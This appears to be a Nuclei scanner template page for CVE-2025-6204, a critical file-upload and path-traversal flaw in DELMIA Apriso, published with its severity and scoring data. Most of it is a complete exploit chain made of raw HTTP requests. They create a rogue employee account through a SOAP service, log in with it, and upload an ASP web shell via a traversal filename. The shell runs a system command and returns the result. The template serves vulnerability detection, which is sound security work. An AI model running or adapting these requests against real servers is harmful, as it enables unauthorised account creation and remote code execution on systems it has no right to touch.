DELMIA Apriso - Command Injection
CVE-2025-6204
Verified
Description
An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.
Severity
Critical
CVSS Score
9
Exploit Probability
1%
Published Date
September 23, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra
+1
CVE-2025-6204.yaml
id: CVE-2025-6204
info:
name: DELMIA Apriso - Command Injection
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
An Improper Control of Generation of Code (code injection / file upload → RCE) vulnerability affecting DELMIA Apriso (Release 2020 → Release 2025). When an authenticated user can upload files and the upload handler fails to canonicalize filenames or enforce storage restrictions, an attacker may place executable artifacts into web-served locations (via path traversal or insufficient normalization) and achieve remote code execution under the webserver context.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-6204
- https://www.3ds.com/trust-center/security/security-advisories/cve-2025-6204
- https://projectdiscovery.io/blog/remote-code-execution-in-delmia-apriso
metadata:
verified: true
max-request: 5
shodan-query: title:"DELMIA Apriso"
classification:
cve-id: CVE-2025-6204
epss-score: 0.00851
epss-percentile: 0.74096
cwe-id: CWE-94
cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
cvss-score: 9.0
tags: cve,cve2025,delmia,apriso,rce,traversal,upload,intrusive
flow: http(1) && http(2) && http(3) && http(4) && http(5)
variables:
filename: "{{randbase(5)}}"
username: "LAST"
password: "9"
http:
- raw:
- |-
POST /Apriso/MessageProcessor/FlexNetMessageProcessor.svc HTTP/2
Host: {{Hostname}}
Content-Type: text/xml;charset=utf-8
Soapaction: "http://tempuri.org/IFlexNetMessageProcessor/ProcessMessageASync_v2"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:ProcessMessageASync_v2>
<tem:xmlMessage><FlexNet_Employees xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="S:/SchemaRepository/XMLSchemas/FlexNet/FlexNet_Employees.xsd" Version="1.0"> 	<Employee> 		<GivenName>FIRST</GivenName> 		<FamilyName>LAST</FamilyName> 		<EmployeeNo>08262004</EmployeeNo> 		<LoginName>{{username}}</LoginName> 		<Password>{{password}}</Password> 		<HireDate>2000-06-01T00:00:00</HireDate> 		<SpokenLanguageID>1033</SpokenLanguageID> 		<WrittenLanguageID>1033</WrittenLanguageID> 		<EmployeeValidDate>2000-06-01T00:00:00</EmployeeValidDate> 		<LoginExpirationDate>9999-12-31T00:00:00</LoginExpirationDate> 		<EmployeeType>0</EmployeeType> 		<DefaultFacility>C1P1</DefaultFacility> 		<TrackLaborFlag>true</TrackLaborFlag> 		<ResourceID NodeType="Field"> 			<Resource_Insert> 				<Name>FIRST</Name> 				<ResourceName>FIRST</ResourceName> 				<ResourceType>1</ResourceType> 				<FUID NodeType="Field"/> 			</Resource_Insert> 		</ResourceID> 		<EmployeeRole> 			<EmployeeID NodeType="Field"/> 			<RoleID NodeType="Field"> 				<Role> 					<Role>Production User</Role> 				</Role> 			</RoleID> 		</EmployeeRole> 	</Employee> </FlexNet_Employees></tem:xmlMessage>
<tem:applicationName>myExternalApplication</tem:applicationName>
</tem:ProcessMessageASync_v2>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
part: body
words:
- ProcessMessageASync_v2Response
- <ProcessMessageASync_v2Result>true</ProcessMessageASync_v2Result>
condition: and
internal: true
- raw:
- |
GET /Apriso/Portal/Kiosk/Login.aspx HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
part: body
name: viewstate
group: 1
regex:
- '__VIEWSTATE" value="(.*?)"'
internal: true
- type: regex
part: body
name: eventval
group: 1
regex:
- '__EVENTVALIDATION" value="(.*?)"'
internal: true
- type: regex
part: body
name: viewgen
group: 1
regex:
- '__VIEWSTATEGENERATOR" value="(.*?)"'
internal: true
- raw:
- |-
POST /Apriso/Portal/Kiosk/Login.aspx?BackToStartPage=true HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewgen}}&__EVENTVALIDATION={{urlencode(eventval)}}&ctl04%24LoginTextBox={{username}}&ctl04%24PasswordTextbox={{password}}&ctl04%24LogInButton=Log+In&ctl04%24HiddenValue=Initial+Value&ctl04%24HiddenValue2=Initial+Value
matchers:
- type: dsl
dsl:
- status_code == 302
internal: true
# Self-deleteable ASP POC File
- raw:
- |
POST /Apriso/webservices/1.1/operation.svc/UploadFile?filename=375c9638-1a4e-465d-90d7-f69321315acb-xxx\..\..\..\portal\Uploads\{{filename}}.asp HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
<%
Response.Write "{{randstr}}" & "<br>"
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
Set fso = Server.CreateObject("Scripting.FileSystemObject")
fso.DeleteFile Server.MapPath(Request.ServerVariables("SCRIPT_NAME")), True
Set fso = Nothing
%>
matchers:
- type: word
part: body
words:
- Uploads
- ResultMessage
- FilePath
- Success
- "{{filename}}.asp"
condition: and
internal: true
- raw:
- |
GET /Apriso/Portal/Uploads/{{filename}}.asp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "{{randstr}}"
extractors:
- type: regex
group: 1
regex:
- <br>(.*)
# digest: 490a00463044022025b335782c1a875d164f3a6d333c1a734135d805b19465198114e26ffa62217e02206727bec8fe38c036db31b6f88c6221be151acdb9549415ddbdc3868e7eb40cb0:922c64590222798bb761d5b6d8e729509.0Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-6204
CWE ID:
cwe-94